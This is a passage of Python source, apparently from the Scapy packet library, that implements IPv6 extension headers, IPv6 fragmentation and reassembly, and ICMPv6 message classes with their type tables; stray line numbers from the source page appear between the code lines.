class _PhantomAutoPadField(ByteField):
    """Field that takes no room on the wire; always dissected as 1."""

    def addfield(self, pkt, s, val):
        # nothing is written when building
        return s

    def getfield(self, pkt, s):
        # nothing is consumed when dissecting
        return s, 1

    def i2repr(self, pkt, x):
        return "On" if x else "Off"

955 

956 

class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
    """Hop-by-Hop Options extension header."""
    name = "IPv6 Extension Header - Hop-by-Hop Options Header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # 'len' counts 8-byte units beyond the first 8 bytes; the 2 added
        # bytes are the 'nh' and 'len' fields themselves
        FieldLenField("len", None, length_of="options", fmt="B",
                      adjust=lambda pkt, x: (x + 9) // 8 - 1),
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _OptionsField("options", [], HBHOptUnknown, 2,
                      length_from=lambda pkt: 8 * (pkt.len + 1) - 2),
    ]
    overload_fields = {IPv6: {"nh": 0}}

966 

967 

968# Destination Option Header # 

969 

class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
    """Destination Options extension header."""
    name = "IPv6 Extension Header - Destination Options Header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # 'len' counts 8-byte units beyond the first 8 bytes; the 2 added
        # bytes are the 'nh' and 'len' fields themselves
        FieldLenField("len", None, length_of="options", fmt="B",
                      adjust=lambda pkt, x: (x + 9) // 8 - 1),
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _OptionsField("options", [], HBHOptUnknown, 2,
                      length_from=lambda pkt: 8 * (pkt.len + 1) - 2),
    ]
    overload_fields = {IPv6: {"nh": 60}}

979 

980 

981# Routing Header # 

982 

class IPv6ExtHdrRouting(_IPv6ExtHdr):
    """Routing extension header carrying a list of IPv6 addresses."""
    name = "IPv6 Option Header Routing"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # in 8 bytes blocks: every 16-byte address counts for two
        FieldLenField("len", None, count_of="addresses", fmt="B",
                      adjust=lambda pkt, x: 2 * x),
        ByteField("type", 0),
        ByteField("segleft", None),
        BitField("reserved", 0, 32),  # There is meaning in this field ...
        IP6ListField("addresses", [],
                     length_from=lambda pkt: 8 * pkt.len),
    ]
    overload_fields = {IPv6: {"nh": 43}}

    def post_build(self, pkt, pay):
        """Set ``segleft`` (byte 3) to the address count when left unset."""
        if self.segleft is None:
            segleft = struct.pack("B", len(self.addresses))
            pkt = pkt[:3] + segleft + pkt[4:]
        return _IPv6ExtHdr.post_build(self, pkt, pay)

999 

1000 

1001# Segment Routing Header # 

1002 

1003# This implementation is based on RFC8754, but some older snippets come from: 

1004# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06 

1005 

1006_segment_routing_header_tlvs = { 

1007 # RFC 8754 sect 8.2 

1008 0: "Pad1 TLV", 

1009 1: "Ingress Node TLV", # draft 06 

1010 2: "Egress Node TLV", # draft 06 

1011 4: "PadN TLV", 

1012 5: "HMAC TLV", 

1013} 

1014 

1015 

class IPv6ExtHdrSegmentRoutingTLV(Packet):
    """Generic Segment Routing TLV, also dispatching to typed subclasses."""
    name = "IPv6 Option Header Segment Routing - Generic TLV"
    # RFC 8754 sect 2.1
    fields_desc = [
        ByteEnumField("type", None, _segment_routing_header_tlvs),
        ByteField("len", 0),
        StrLenField("value", "", length_from=lambda pkt: pkt.len),
    ]

    # TLV type code -> class handling it, filled by register_variant().
    registered_sr_tlv = {}

    def extract_padding(self, p):
        # A TLV carries no payload: all remaining bytes go back as padding.
        return b"", p

    @classmethod
    def register_variant(cls):
        """Record ``cls`` under the default value of its ``type`` field."""
        cls.registered_sr_tlv[cls.type.default] = cls

    @classmethod
    def dispatch_hook(cls, pkt=None, *args, **kargs):
        """Pick the registered class matching the first byte of ``pkt``."""
        if not pkt:
            return cls
        return cls.registered_sr_tlv.get(ord(pkt[:1]), cls)

1038 

1039 

class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
    """Segment Routing TLV of type 1 holding an ingress node address."""
    name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
    # draft-ietf-6man-segment-routing-header-06 3.1.1
    fields_desc = [
        ByteEnumField("type", 1, _segment_routing_header_tlvs),
        ByteField("len", 18),
        ByteField("reserved", 0),
        ByteField("flags", 0),
        IP6Field("ingress_node", "::1"),
    ]

1048 

1049 

class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
    """Segment Routing TLV of type 2 holding an egress node address."""
    name = "IPv6 Option Header Segment Routing - Egress Node TLV"
    # draft-ietf-6man-segment-routing-header-06 3.1.2
    fields_desc = [
        ByteEnumField("type", 2, _segment_routing_header_tlvs),
        ByteField("len", 18),
        ByteField("reserved", 0),
        ByteField("flags", 0),
        IP6Field("egress_node", "::1"),
    ]

1058 

1059 

class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV):
    """Single-byte padding TLV (type 0, no length nor value)."""
    name = "IPv6 Option Header Segment Routing - Pad1 TLV"
    # RFC8754 sect 2.1.1.1, Pad1 is a single byte
    fields_desc = [
        ByteEnumField("type", 0, _segment_routing_header_tlvs),
    ]

1064 

1065 

class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV):
    """Variable-size padding TLV (type 4); ``len`` follows ``padding``."""
    name = "IPv6 Option Header Segment Routing - PadN TLV"
    # RFC8754 sect 2.1.1.2
    fields_desc = [
        ByteEnumField("type", 4, _segment_routing_header_tlvs),
        FieldLenField("len", None, length_of="padding", fmt="B"),
        StrLenField("padding", b"\x00",
                    length_from=lambda pkt: pkt.len),
    ]

1072 

1073 

class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV):
    """Segment Routing HMAC TLV (type 5).

    ``len`` is a single octet, like in the other TLVs of this file, and
    counts the bytes that follow it: 2 octets of D/reserved bits, 4 octets
    of key id, then the HMAC itself.
    """
    name = "IPv6 Option Header Segment Routing - HMAC TLV"
    # RFC8754 sect 2.1.2
    fields_desc = [
        ByteEnumField("type", 5, _segment_routing_header_tlvs),
        # fmt="B": one-octet length; + 6 covers D/reserved and hmackeyid.
        FieldLenField("len", None, length_of="hmac", fmt="B",
                      adjust=lambda _, x: x + 6),
        BitField("D", 0, 1),
        BitField("reserved", 0, 15),
        IntField("hmackeyid", 0),
        # Clamp at 0 so an undersized len cannot give a negative slice.
        StrLenField("hmac", "",
                    length_from=lambda pkt: max(pkt.len - 6, 0)),
    ]

1085 

1086 

class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
    """Segment Routing extension header: segment list followed by TLVs.

    ``len``, ``segleft`` and ``lastentry`` are computed in post_build()
    when they are left to None.
    """
    name = "IPv6 Option Header Segment Routing"
    # RFC8754 sect 2. + flag bits from draft 06
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteField("type", 4),
        ByteField("segleft", None),
        ByteField("lastentry", None),
        BitField("unused1", 0, 1),
        BitField("protected", 0, 1),
        BitField("oam", 0, 1),
        BitField("alert", 0, 1),
        BitField("hmac", 0, 1),
        BitField("unused2", 0, 3),
        ShortField("tag", 0),
        IP6ListField("addresses", ["::1"],
                     count_from=lambda pkt: (pkt.lastentry + 1)),
        PacketListField("tlv_objects", [],
                        IPv6ExtHdrSegmentRoutingTLV,
                        length_from=lambda pkt: 8 * pkt.len - 16 * (
                            pkt.lastentry + 1
                        )),
    ]

    overload_fields = {IPv6: {"nh": 43}}

    def post_build(self, pkt, pay):
        """Pad the header to 8 bytes and fill in the unset counters."""
        if self.len is None:
            # The extension must be aligned on 8 bytes
            missing = -len(pkt) % 8
            if missing == 1:
                pkt += raw(IPv6ExtHdrSegmentRoutingTLVPad1())
            elif missing >= 2:
                # Add the padding extension (2 bytes go to type and len)
                filler = b"\x00" * (missing - 2)
                pkt += raw(IPv6ExtHdrSegmentRoutingTLVPadN(padding=filler))

            # 8-octet units, not counting the first one
            hdr_len = (len(pkt) - 8) // 8
            pkt = pkt[:1] + struct.pack("B", hdr_len) + pkt[2:]

        if self.segleft is None:
            # Index of the last address, or 0 for an empty list
            segleft = max(len(self.addresses) - 1, 0)
            pkt = pkt[:3] + struct.pack("B", segleft) + pkt[4:]

        if self.lastentry is None:
            count = len(self.addresses)
            if count:
                last = count - 1
            else:
                warning(
                    "IPv6ExtHdrSegmentRouting(): the addresses list is empty!"
                )
                last = 0
            pkt = pkt[:4] + struct.pack("B", last) + pkt[5:]

        return _IPv6ExtHdr.post_build(self, pkt, pay)

1147 

1148 

1149# Fragmentation Header # 

1150 

class IPv6ExtHdrFragment(_IPv6ExtHdr):
    """Fragment extension header (sets IPv6 ``nh`` to 44)."""
    name = "IPv6 Extension Header - Fragmentation header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        BitField("res1", 0, 8),
        BitField("offset", 0, 13),
        BitField("res2", 0, 2),
        BitField("m", 0, 1),
        IntField("id", None),
    ]
    overload_fields = {IPv6: {"nh": 44}}

    def guess_payload_class(self, p):
        """Treat the payload of a non-first fragment as raw bytes."""
        if self.offset > 0:
            return Raw
        return super().guess_payload_class(p)

1166 

1167 

def defragment6(packets):
    """
    Performs defragmentation of a list of IPv6 packets. Packets are reordered.
    Crap is dropped. What lacks is completed by 'X' characters.

    Only the fragments sharing the identification of the first fragment
    found are used; the others are dropped with a warning.

    :param packets: iterable of packets, fragments or not
    :return: the reassembled packet, or an empty list when ``packets``
        holds no fragment
    """

    # Remove non fragments
    lst = [x for x in packets if IPv6ExtHdrFragment in x]
    if not lst:
        return []

    frag_id = lst[0][IPv6ExtHdrFragment].id

    llen = len(lst)
    lst = [x for x in lst if x[IPv6ExtHdrFragment].id == frag_id]
    if len(lst) != llen:
        warning("defragment6: some fragmented packets have been removed from list")  # noqa: E501

    # Reorder fragments by increasing offset. sorted() is stable, so
    # fragments with the same offset keep their arrival order.
    res = sorted(lst, key=lambda x: x[IPv6ExtHdrFragment].offset)

    # regenerate the fragmentable part
    fragmentable = b""
    frag_hdr_len = 8
    for p in res:
        q = p[IPv6ExtHdrFragment]
        offset = 8 * q.offset
        if offset != len(fragmentable):
            warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))  # noqa: E501
        frag_data_len = p[IPv6].plen
        if frag_data_len is not None:
            frag_data_len -= frag_hdr_len
        # Fill the hole, if any (a negative count yields nothing)
        fragmentable += b"X" * (offset - len(fragmentable))
        fragmentable += raw(q.payload)[:frag_data_len]

    # Regenerate the unfragmentable part.
    q = res[0].copy()
    nh = q[IPv6ExtHdrFragment].nh
    q[IPv6ExtHdrFragment].underlayer.nh = nh
    q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable)
    del q[IPv6ExtHdrFragment].underlayer.payload
    q /= conf.raw_layer(load=fragmentable)
    del q.plen

    # Dissect the rebuilt bytes again to get the upper layers back
    if q[IPv6].underlayer:
        q[IPv6] = IPv6(raw(q[IPv6]))
    else:
        q = IPv6(raw(q))
    return q

1227 

1228 

def fragment6(pkt, fragSize):
    """
    Performs fragmentation of an IPv6 packet. 'fragSize' argument is the
    expected maximum size of fragment data (MTU). The list of packets is
    returned.

    If packet does not contain an IPv6ExtHdrFragment class, it is added to
    first IPv6 layer found. If no IPv6 layer exists packet is returned in
    result list unmodified.

    :param pkt: the packet to fragment; a copy is worked on
    :param fragSize: maximum size, in bytes, of each built fragment
    :return: list of packets; empty when the packet is bigger than 65535
        bytes
    """

    pkt = pkt.copy()

    if IPv6ExtHdrFragment not in pkt:
        if IPv6 not in pkt:
            return [pkt]

        # Insert a fragment header right after the first IPv6 layer
        layer3 = pkt[IPv6]
        data = layer3.payload
        frag = IPv6ExtHdrFragment(nh=layer3.nh)

        layer3.remove_payload()
        del layer3.nh
        del layer3.plen

        frag.add_payload(data)
        layer3.add_payload(frag)

    # If the payload is bigger than 65535, a Jumbo payload must be used, as
    # an IPv6 packet can't be bigger than 65535 bytes.
    if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
        warning("An IPv6 packet can't be bigger than 65535, please use a Jumbo payload.")  # noqa: E501
        return []

    s = raw(pkt)  # for instantiation to get upper layer checksum right

    if len(s) <= fragSize:
        return [pkt]

    # Fragmentable part : fake IPv6 for Fragmentable part length computation
    fragPart = pkt[IPv6ExtHdrFragment].payload
    tmp = raw(IPv6(src="::1", dst="::1") / fragPart)
    fragPartLen = len(tmp) - 40  # basic IPv6 header length
    fragPartStr = s[-fragPartLen:]

    # Grab Next Header for use in Fragment Header
    nh = pkt[IPv6ExtHdrFragment].nh

    # Keep fragment header
    fragHeader = pkt[IPv6ExtHdrFragment]
    del fragHeader.payload  # detach payload

    # Unfragmentable Part
    unfragPartLen = len(s) - fragPartLen - 8
    unfragPart = pkt
    del pkt[IPv6ExtHdrFragment].underlayer.payload  # detach payload

    # Cut the fragmentable part to fit fragSize. Inner fragments have
    # a length that is an integer multiple of 8 octets. last Frag MTU
    # can be anything below MTU
    lastFragSize = fragSize - unfragPartLen - 8
    innerFragSize = lastFragSize - (lastFragSize % 8)

    if lastFragSize <= 0 or innerFragSize == 0:
        # An inner fragment carries at least 8 bytes of data, on top of
        # the unfragmentable part and the 8-byte fragment header.
        warning("Provided fragment size value is too low. " +
                "Should be at least %d" % (unfragPartLen + 16))
        return [unfragPart / fragHeader / fragPart]

    remain = fragPartStr
    res = []
    fragOffset = 0  # offset, incremented during creation
    fragId = random.randint(0, 0xffffffff)  # random id ...
    if fragHeader.id is not None:  # ... except id provided by user
        fragId = fragHeader.id
    fragHeader.m = 1
    fragHeader.id = fragId
    fragHeader.nh = nh

    # Let every fragment compute its own payload length. "/" works on
    # copies, so resetting it once on the template is enough.
    if IPv6 in unfragPart:
        unfragPart[IPv6].plen = None

    # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
    while len(remain) > lastFragSize:
        chunk = remain[:innerFragSize]
        remain = remain[innerFragSize:]
        fragHeader.offset = fragOffset  # update offset
        fragOffset += innerFragSize // 8  # compute new one
        res.append(unfragPart / fragHeader / conf.raw_layer(load=chunk))

    # Last fragment: whatever remains, with the "more" flag cleared
    fragHeader.offset = fragOffset
    fragHeader.m = 0
    res.append(unfragPart / fragHeader / conf.raw_layer(load=remain))
    return res

1327 

1328 

1329############################################################################# 

1330############################################################################# 

1331# ICMPv6* Classes # 

1332############################################################################# 

1333############################################################################# 

1334 

1335 

# ICMPv6 type value -> name of the class implementing that message.
icmp6typescls = {
    1: "ICMPv6DestUnreach",
    2: "ICMPv6PacketTooBig",
    3: "ICMPv6TimeExceeded",
    4: "ICMPv6ParamProblem",
    128: "ICMPv6EchoRequest",
    129: "ICMPv6EchoReply",
    130: "ICMPv6MLQuery",  # MLDv1 or MLDv2
    131: "ICMPv6MLReport",
    132: "ICMPv6MLDone",
    133: "ICMPv6ND_RS",
    134: "ICMPv6ND_RA",
    135: "ICMPv6ND_NS",
    136: "ICMPv6ND_NA",
    137: "ICMPv6ND_Redirect",
    # 138: Do Me - RFC 2894 - Seems painful
    139: "ICMPv6NIQuery",
    140: "ICMPv6NIReply",
    141: "ICMPv6ND_INDSol",
    142: "ICMPv6ND_INDAdv",
    143: "ICMPv6MLReport2",
    144: "ICMPv6HAADRequest",
    145: "ICMPv6HAADReply",
    146: "ICMPv6MPSol",
    147: "ICMPv6MPAdv",
    # 148: Do Me - SEND related - RFC 3971
    # 149: Do Me - SEND related - RFC 3971
    151: "ICMPv6MRD_Advertisement",
    152: "ICMPv6MRD_Solicitation",
    153: "ICMPv6MRD_Termination",
    # 154: Do Me - FMIPv6 Messages - RFC 5568
    155: "ICMPv6RPL",  # RFC 6550
}

1368 

# ICMPv6 type value -> minimal header length, in bytes, of that message.
icmp6typesminhdrlen = {
    1: 8,
    2: 8,
    3: 8,
    4: 8,
    128: 8,
    129: 8,
    130: 24,
    131: 24,
    132: 24,
    133: 8,
    134: 16,
    135: 24,
    136: 24,
    137: 40,
    # 139:
    # 140
    141: 8,
    142: 8,
    143: 8,
    144: 8,
    145: 8,
    146: 8,
    147: 8,
    151: 8,
    152: 4,
    153: 4,
    155: 4,
}

1397 

# ICMPv6 type value -> display name.
icmp6types = {
    1: "Destination unreachable",
    2: "Packet too big",
    3: "Time exceeded",
    4: "Parameter problem",
    100: "Private Experimentation",
    101: "Private Experimentation",
    128: "Echo Request",
    129: "Echo Reply",
    130: "MLD Query",
    131: "MLD Report",
    132: "MLD Done",
    133: "Router Solicitation",
    134: "Router Advertisement",
    135: "Neighbor Solicitation",
    136: "Neighbor Advertisement",
    137: "Redirect Message",
    138: "Router Renumbering",
    139: "ICMP Node Information Query",
    140: "ICMP Node Information Response",
    141: "Inverse Neighbor Discovery Solicitation Message",
    142: "Inverse Neighbor Discovery Advertisement Message",
    143: "MLD Report Version 2",
    144: "Home Agent Address Discovery Request Message",
    145: "Home Agent Address Discovery Reply Message",
    146: "Mobile Prefix Solicitation",
    147: "Mobile Prefix Advertisement",
    148: "Certification Path Solicitation",
    149: "Certification Path Advertisement",
    151: "Multicast Router Advertisement",
    152: "Multicast Router Solicitation",
    153: "Multicast Router Termination",
    155: "RPL Control Message",
    200: "Private Experimentation",
    201: "Private Experimentation",
}

1432 

1433 

class _ICMPv6(Packet):
    """Base class of the ICMPv6 messages: checksum and answer matching."""
    name = "ICMPv6 dummy class"
    overload_fields = {IPv6: {"nh": 58}}

    def post_build(self, p, pay):
        """Append the payload and fill the checksum when it is unset."""
        p += pay
        if self.cksum is not None:
            return p
        chksum = in6_chksum(58, self.underlayer, p)
        # The checksum occupies bytes 2 and 3 of the message
        return p[:2] + struct.pack("!H", chksum) + p[4:]

    def hashret(self):
        return self.payload.hashret()

    def answers(self, other):
        """Return 1 when type and code match those of ``other``, else 0.

        Only applies when this message sits on top of an IPerror6, or on
        top of an extension header while ``other`` is an ICMPv6 message.
        """
        under = self.underlayer
        quoted = isinstance(under, IPerror6)
        # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
        behind_exthdr = (isinstance(under, _IPv6ExtHdr) and
                         isinstance(other, _ICMPv6))
        if not (quoted or behind_exthdr):
            return 0
        if self.type == other.type and self.code == other.code:
            return 1
        return 0

1458 

1459 

class _ICMPv6Error(_ICMPv6):
    """Base class of the ICMPv6 error messages."""
    name = "ICMPv6 errors dummy class"

    def guess_payload_class(self, p):
        # The payload is always dissected as IPerror6
        return IPerror6

1465 

1466 

class ICMPv6Unknown(_ICMPv6):
    """Fallback ICMPv6 message keeping the whole body as a string."""
    name = "Scapy6 ICMPv6 fallback class"
    fields_desc = [
        ByteEnumField("type", 1, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        StrField("msgbody", ""),
    ]

1473 

1474 

1475# RFC 2460 # 

1476 

class ICMPv6DestUnreach(_ICMPv6Error):
    """ICMPv6 Destination Unreachable error (type 1)."""
    name = "ICMPv6 Destination Unreachable"
    fields_desc = [
        ByteEnumField("type", 1, icmp6types),
        ByteEnumField("code", 0, {
            0: "No route to destination",
            1: "Communication with destination administratively prohibited",
            2: "Beyond scope of source address",
            3: "Address unreachable",
            4: "Port unreachable",
        }),
        XShortField("cksum", None),
        ByteField("length", 0),
        X3BytesField("unused", 0),
        _ICMPExtensionPadField(),
        _ICMPExtensionField(),
    ]
    post_dissection = _ICMP_extpad_post_dissection

1491 

1492 

class ICMPv6PacketTooBig(_ICMPv6Error):
    """ICMPv6 Packet Too Big error (type 2) carrying an MTU value."""
    name = "ICMPv6 Packet Too Big"
    fields_desc = [
        ByteEnumField("type", 2, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        IntField("mtu", 1280),
    ]

1499 

1500 

class ICMPv6TimeExceeded(_ICMPv6Error):
    """ICMPv6 Time Exceeded error (type 3)."""
    name = "ICMPv6 Time Exceeded"
    fields_desc = [
        ByteEnumField("type", 3, icmp6types),
        ByteEnumField("code", 0, {
            0: "hop limit exceeded in transit",
            1: "fragment reassembly time exceeded",
        }),
        XShortField("cksum", None),
        ByteField("length", 0),
        X3BytesField("unused", 0),
        _ICMPExtensionPadField(),
        _ICMPExtensionField(),
    ]
    post_dissection = _ICMP_extpad_post_dissection

1512 

1513 

1514# The default pointer value is set to the next header field of 

1515# the encapsulated IPv6 packet 

1516 

1517 

class ICMPv6ParamProblem(_ICMPv6Error):
    """ICMPv6 Parameter Problem error (type 4); ``ptr`` defaults to 6."""
    name = "ICMPv6 Parameter Problem"
    fields_desc = [
        ByteEnumField("type", 4, icmp6types),
        ByteEnumField("code", 0, {
            0: "erroneous header field encountered",
            1: "unrecognized Next Header type encountered",
            2: "unrecognized IPv6 option encountered",
            3: "first fragment has incomplete header chain",
        }),
        XShortField("cksum", None),
        IntField("ptr", 6),
    ]

1529 

1530 

class ICMPv6EchoRequest(_ICMPv6):
    """ICMPv6 Echo Request (type 128)."""
    name = "ICMPv6 Echo Request"
    fields_desc = [
        ByteEnumField("type", 128, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XShortField("id", 0),
        XShortField("seq", 0),
        StrField("data", ""),
    ]

    def mysummary(self):
        return self.sprintf("%name% (id: %id% seq: %seq%)")

    def hashret(self):
        # id and seq, packed, followed by the hash of the payload
        id_seq = struct.pack("HH", self.id, self.seq)
        return id_seq + self.payload.hashret()

1545 

1546 

class ICMPv6EchoReply(ICMPv6EchoRequest):
    """ICMPv6 Echo Reply (type 129)."""
    name = "ICMPv6 Echo Reply"
    type = 129

    def answers(self, other):
        """Match an Echo Request with the same id, seq and data."""
        # We could match data content between request and reply.
        return (
            isinstance(other, ICMPv6EchoRequest) and
            self.id == other.id and
            self.seq == other.seq and
            self.data == other.data
        )

1556 

1557 

1558# ICMPv6 Multicast Listener Discovery (RFC2710) # 

1559 

1560# all MLD messages are sent with a link-local source address 

1561# -> Make sure of it in post_build if none is specified 

1562# The Hop-Limit value must be 1 

1563# "and an IPv6 Router Alert option in a Hop-by-Hop Options 

1564# header. (The router alert option is necessary to cause routers to 

1565# examine MLD messages sent to multicast addresses in which the router 

1566# itself has no interest" 

class _ICMPv6ML(_ICMPv6):
    """Fields shared by the MLD Query, Report and Done messages."""
    fields_desc = [
        ByteEnumField("type", 130, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        ShortField("mrd", 0),
        ShortField("reserved", 0),
        IP6Field("mladdr", "::"),
    ]

1574 

1575# general queries are sent to the link-scope all-nodes multicast 

1576# address ff02::1, with a multicast address field of 0 and a MRD of 

1577# [Query Response Interval] 

1578# Default value for mladdr is set to 0 for a General Query, and 

1579# overloaded by the user for a Multicast Address specific query 

1580# TODO : See what we can do to automatically include a Router Alert 

1581# Option in a Destination Option Header. 

1582 

1583 

class ICMPv6MLQuery(_ICMPv6ML):  # RFC 2710
    """MLD Query (type 130), sent to ff02::1 with a hop limit of 1."""
    name = "MLD - Multicast Listener Query"
    type = 130
    mrd = 10000  # 10s for mrd
    mladdr = "::"
    overload_fields = {
        IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58},
    }

1590 

1591 

1592# TODO : See what we can do to automatically include a Router Alert 

1593# Option in a Destination Option Header. 

class ICMPv6MLReport(_ICMPv6ML):  # RFC 2710
    """MLD Report (type 131), sent with a hop limit of 1."""
    name = "MLD - Multicast Listener Report"
    type = 131
    overload_fields = {
        IPv6: {"hlim": 1, "nh": 58},
    }

    def answers(self, query):
        """Check the query type"""
        return ICMPv6MLQuery in query

1602 

1603# When a node ceases to listen to a multicast address on an interface, 

1604# it SHOULD send a single Done message to the link-scope all-routers 

1605# multicast address (FF02::2), carrying in its multicast address field 

1606# the address to which it is ceasing to listen 

1607# TODO : See what we can do to automatically include a Router Alert 

1608# Option in a Destination Option Header. 

1609 

1610 

class ICMPv6MLDone(_ICMPv6ML):  # RFC 2710
    """MLD Done (type 132), sent to ff02::2 with a hop limit of 1."""
    name = "MLD - Multicast Listener Done"
    type = 132
    overload_fields = {
        IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58},
    }

1615 

1616 

1617# Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) # 

1618 

class ICMPv6MLQuery2(_ICMPv6):  # RFC 3810
    """MLDv2 Query (type 130) with an optional list of sources."""
    name = "MLDv2 - Multicast Listener Query"
    fields_desc = [
        ByteEnumField("type", 130, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        ShortField("mrd", 10000),
        ShortField("reserved", 0),
        IP6Field("mladdr", "::"),
        BitField("Resv", 0, 4),
        BitField("S", 0, 1),
        BitField("QRV", 0, 3),
        ByteField("QQIC", 0),
        ShortField("sources_number", None),
        IP6ListField("sources", [],
                     count_from=lambda pkt: pkt.sources_number),
    ]

    # RFC 3810 - Message Formats
    overload_fields = {
        IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58},
    }

    def post_build(self, packet, payload):
        """Compute the 'sources_number' field when needed"""
        if self.sources_number is None:
            # sources_number occupies bytes 26 and 27 of the message
            count = struct.pack("!H", len(self.sources))
            packet = b"".join((packet[:26], count, packet[28:]))
        return _ICMPv6.post_build(self, packet, payload)

1644 

1645 

class ICMPv6MLDMultAddrRec(Packet):
    """One Multicast Address Record of an MLDv2 Report."""
    name = "ICMPv6 MLDv2 - Multicast Address Record"
    fields_desc = [
        ByteField("rtype", 4),
        FieldLenField("auxdata_len", None,
                      length_of="auxdata",
                      fmt="B"),
        # Number of sources: byte length of the list over 16
        FieldLenField("sources_number", None,
                      length_of="sources",
                      adjust=lambda p, num: num // 16),
        IP6Field("dst", "::"),
        IP6ListField("sources", [],
                     length_from=lambda p: 16 * p.sources_number),
        StrLenField("auxdata", "",
                    length_from=lambda p: p.auxdata_len),
    ]

    def default_payload_class(self, packet):
        """Multicast Address Record followed by another one"""
        return self.__class__

1664 

1665 

class ICMPv6MLReport2(_ICMPv6):  # RFC 3810
    """MLDv2 Report (type 143) holding Multicast Address Records."""
    name = "MLDv2 - Multicast Listener Report"
    fields_desc = [
        ByteEnumField("type", 143, icmp6types),
        ByteField("res", 0),
        XShortField("cksum", None),
        ShortField("reserved", 0),
        ShortField("records_number", None),
        PacketListField("records", [],
                        ICMPv6MLDMultAddrRec,
                        count_from=lambda p: p.records_number),
    ]

    # RFC 3810 - Message Formats
    overload_fields = {
        IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58},
    }

    def post_build(self, packet, payload):
        """Compute the 'records_number' field when needed"""
        if self.records_number is None:
            # records_number occupies bytes 6 and 7 of the message
            count = struct.pack("!H", len(self.records))
            packet = b"".join((packet[:6], count, packet[8:]))
        return _ICMPv6.post_build(self, packet, payload)

    def answers(self, query):
        """Check the query type"""
        return isinstance(query, ICMPv6MLQuery2)

1690 

1691 

1692# ICMPv6 MRD - Multicast Router Discovery (RFC 4286) # 

1693 

1694# TODO: 

1695# - 04/09/06 troglocan : find a way to automatically add a router alert 

1696# option for all MRD packets. This could be done in a specific 

1697# way when IPv6 is the under layer with some specific keyword 

1698# like 'exthdr'. This would allow to keep compatibility with 

1699# providing IPv6 fields to be overloaded in fields_desc. 

1700# 

1701# At the moment, if user inserts an IPv6 Router alert option 

1702# none of the IPv6 default values of IPv6 layer will be set. 

1703 

class ICMPv6MRD_Advertisement(_ICMPv6):
    """Multicast Router Discovery Advertisement (type 151), 8 bytes long."""
    name = "ICMPv6 Multicast Router Discovery Advertisement"
    fields_desc = [
        ByteEnumField("type", 151, icmp6types),
        ByteField("advinter", 20),
        XShortField("cksum", None),
        ShortField("queryint", 0),
        ShortField("robustness", 0),
    ]
    # IPv6 Router Alert requires manual inclusion
    overload_fields = {
        IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"},
    }

    def extract_padding(self, s):
        # Split after the first 8 bytes
        head, tail = s[:8], s[8:]
        return head, tail

1716 

1717 

class ICMPv6MRD_Solicitation(_ICMPv6):
    """Multicast Router Discovery Solicitation (type 152), 4 bytes long."""
    name = "ICMPv6 Multicast Router Discovery Solicitation"
    fields_desc = [
        ByteEnumField("type", 152, icmp6types),
        ByteField("res", 0),
        XShortField("cksum", None),
    ]
    # IPv6 Router Alert requires manual inclusion
    overload_fields = {
        IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"},
    }

    def extract_padding(self, s):
        # Split after the first 4 bytes
        head, tail = s[:4], s[4:]
        return head, tail

1728 

1729 

class ICMPv6MRD_Termination(_ICMPv6):
    """Multicast Router Discovery Termination (type 153), 4 bytes long."""
    name = "ICMPv6 Multicast Router Discovery Termination"
    fields_desc = [
        ByteEnumField("type", 153, icmp6types),
        ByteField("res", 0),
        XShortField("cksum", None),
    ]
    # IPv6 Router Alert requires manual inclusion
    overload_fields = {
        IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"},
    }

    def extract_padding(self, s):
        # Split after the first 4 bytes
        head, tail = s[:4], s[4:]
        return head, tail

1740 

1741 

1742# ICMPv6 Neighbor Discovery (RFC 2461) # 

1743 

# Neighbor Discovery option type -> display name.
icmp6ndopts = {
    1: "Source Link-Layer Address",
    2: "Target Link-Layer Address",
    3: "Prefix Information",
    4: "Redirected Header",
    5: "MTU",
    6: "NBMA Shortcut Limit Option",  # RFC2491
    7: "Advertisement Interval Option",
    8: "Home Agent Information Option",
    9: "Source Address List",
    10: "Target Address List",
    11: "CGA Option",  # RFC 3971
    12: "RSA Signature Option",  # RFC 3971
    13: "Timestamp Option",  # RFC 3971
    14: "Nonce option",  # RFC 3971
    15: "Trust Anchor Option",  # RFC 3971
    16: "Certificate Option",  # RFC 3971
    17: "IP Address Option",  # RFC 4068
    18: "New Router Prefix Information Option",  # RFC 4068
    19: "Link-layer Address Option",  # RFC 4068
    20: "Neighbor Advertisement Acknowledgement Option",
    21: "CARD Request Option",  # RFC 4065/4066/4067
